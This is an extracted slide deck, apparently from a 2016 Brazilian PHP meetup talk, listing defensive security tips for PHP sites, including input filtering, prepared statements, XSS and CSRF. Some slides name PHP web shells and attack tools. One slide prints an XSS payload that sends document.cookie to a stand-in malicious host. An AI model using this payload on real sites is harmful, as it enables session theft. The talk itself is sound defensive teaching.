dicas de segurança para o php e seus amigos
TRANSCRIPT
![Page 1: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/1.jpg)
Dicas de segurança para o PHP e seus amigos7º PHPMG TALKS - 2016
![Page 2: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/2.jpg)
Eu? Sou este ai
https://github.com/joubertredrat
https://br.linkedin.com/in/joubertredrat
https://twitter.com/joubertredrat
http://www.vivaolinux.com.br/~joubertredrat* no meu Linkedin explica o porque do apelido RedRat
https://creativecommons.org/licenses/by-sa/4.0/
Dicas de segurança para o PHP e seus amigos
![Page 3: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/3.jpg)
Dicas de segurança para o PHP e seus amigos
INFORMAÇÃO É PODER
QUEM TEM INFORMAÇÃO DOMINA O MUNDO
![Page 4: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/4.jpg)
Dicas de segurança para o PHP e seus amigos
1ª DICA
REMOVER INFORMAÇÕES DESNECESSÁRIAS
![Page 5: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/5.jpg)
Dicas de segurança para o PHP e seus amigos
1ª DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
![Page 6: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/6.jpg)
Dicas de segurança para o PHP e seus amigos
1ª DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
![Page 7: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/7.jpg)
Dicas de segurança para o PHP e seus amigos
2ª DICA
ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
![Page 8: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/8.jpg)
Dicas de segurança para o PHP e seus amigos
2ª DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
![Page 9: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/9.jpg)
Dicas de segurança para o PHP e seus amigos
3ª DICA
DESABILITAR OU EVITAR RECURSOS EXTERNOS
![Page 10: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/10.jpg)
Dicas de segurança para o PHP e seus amigos
3ª DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS
R57 R6
C99Shell C100Shell
bypass Tool25
b374k
GaZa
![Page 11: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/11.jpg)
Dicas de segurança para o PHP e seus amigos
3ª DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS
http://php.net/allow-url-include
![Page 12: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/12.jpg)
Dicas de segurança para o PHP e seus amigos
4ª DICA
USAR URL AMIGÁVEIS E EVITAR QUERY STRING
![Page 13: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/13.jpg)
Dicas de segurança para o PHP e seus amigos
4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
![Page 14: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/14.jpg)
Dicas de segurança para o PHP e seus amigos
5ª DICA
TRATAR OS DADOS VINDOS DO USUÁRIO
MESMO ASSIM QUER USAR QUERY STRING?
4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
![Page 15: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/15.jpg)
Dicas de segurança para o PHP e seus amigos
5ª DICA - TRATAR OS DADOS VINDOS DO USUÁRIO
filter_var
mysqli_stmt_bind_param
PDOStatement::bindValue
DateTime::getLastErrors();
is_(bool,callable,numeric,float,string,object,etc)
Libs no Packagist
![Page 16: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/16.jpg)
Dicas de segurança para o PHP e seus amigos
5ª DICA - TRATAR OS DADOS VINDOS DO USUÁRIO
Quer fazer testes?
sqlmap Zed Attack Proxy “ZAP”
BeEF sqlninja
![Page 17: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/17.jpg)
Dicas de segurança para o PHP e seus amigos
6ª DICA
EVITAR O USO DA PRIMARY KEY OU ID
![Page 18: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/18.jpg)
Dicas de segurança para o PHP e seus amigos
6ª DICA - EVITAR O USO DA PRIMARY KEY OU ID
• UUID• GUID• MD5/CRC32/SHA1/SHA256• Hash ou Ofuscamento
![Page 19: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/19.jpg)
Dicas de segurança para o PHP e seus amigos
6ª DICA - EVITAR O USO DA PRIMARY KEY OU ID
![Page 20: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/20.jpg)
Dicas de segurança para o PHP e seus amigos
7ª DICA (PRIMA DA 5ª DICA)
CROSS-SITE SCRIPTING
![Page 21: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/21.jpg)
Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
![Page 22: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/22.jpg)
Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
![Page 23: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/23.jpg)
Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
![Page 24: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/24.jpg)
Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>
![Page 25: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/25.jpg)
Dicas de segurança para o PHP e seus amigos
8ª DICA
CROSS SITE REQUEST FORGERY
![Page 26: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/26.jpg)
Dicas de segurança para o PHP e seus amigos
8ª DICA - CROSS SITE REQUEST FORGERY
![Page 27: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/27.jpg)
Dicas de segurança para o PHP e seus amigos
9ª DICA
USAR CHECKSUM OU O VCS AO SEU FAVOR
![Page 28: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/28.jpg)
Dicas de segurança para o PHP e seus amigos
9ª DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR
![Page 29: Dicas de segurança para o PHP e seus amigos](https://reader031.vdocuments.mx/reader031/viewer/2022030402/58a89db71a28ab7f458b4775/html5/thumbnails/29.jpg)
Dicas de segurança para o PHP e seus amigos
ACABOU AS DICAS POR HOJE
PERGUNTAS?
FALA QUE NÃO TEM